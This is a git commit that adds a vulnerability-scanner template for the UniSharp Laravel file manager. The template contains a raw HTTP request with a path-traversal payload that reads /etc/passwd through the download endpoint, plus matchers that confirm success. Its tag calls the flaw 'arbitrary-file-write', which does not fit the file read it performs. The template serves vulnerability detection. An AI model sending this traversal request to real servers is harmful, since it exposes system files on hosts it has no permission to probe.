Create unisharp-laravel-file-manager.yaml

patch-1
Prince Chaddha 2022-03-11 02:00:23 +05:30 committed by GitHub
parent 99c244811c
commit d7b8f35d9f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: unisharp-laravel-file-manager
info:
name: unisharp-laravel-file-manager
author: hackerarpan
severity: critical
reference: https://www.exploit-db.com/exploits/50639
tags: arbitrary-file-write
requests:
- raw:
- |
GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- root
part: body
- type: status
status:
- 200